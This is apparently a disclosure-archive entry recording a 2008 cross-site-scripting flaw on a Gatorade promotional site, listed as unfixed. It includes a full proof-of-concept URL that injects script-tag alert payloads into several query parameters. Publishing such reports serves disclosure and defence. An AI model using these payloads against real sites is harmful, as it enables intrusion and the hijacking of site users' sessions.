Security researcher Azat Harutyunyan, has submitted on 22/05/2008 a cross-site-scripting (XSS) vulnerability affecting playeroftheyear.gatorade.com, which at the time of submission ranked 114821 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 22/05/2008 |
Date published: 22/05/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Azat Harutyunyan |
Domain: playeroftheyear.gatorade.com |
Category: XSS |
Pagerank: 114821 |
URL: http://playeroftheyear.gatorade.com/playeroftheyear/state.php?formname=search&lvl="><script>alert(1) </script>&sprt="><script>alert(1)</script>&yr="><script>alert(1)</script>&st="><script>alert(1)</scr ipt>&search.x=463&search.y=438&search=search |
Click here to view the mirror
|
|
|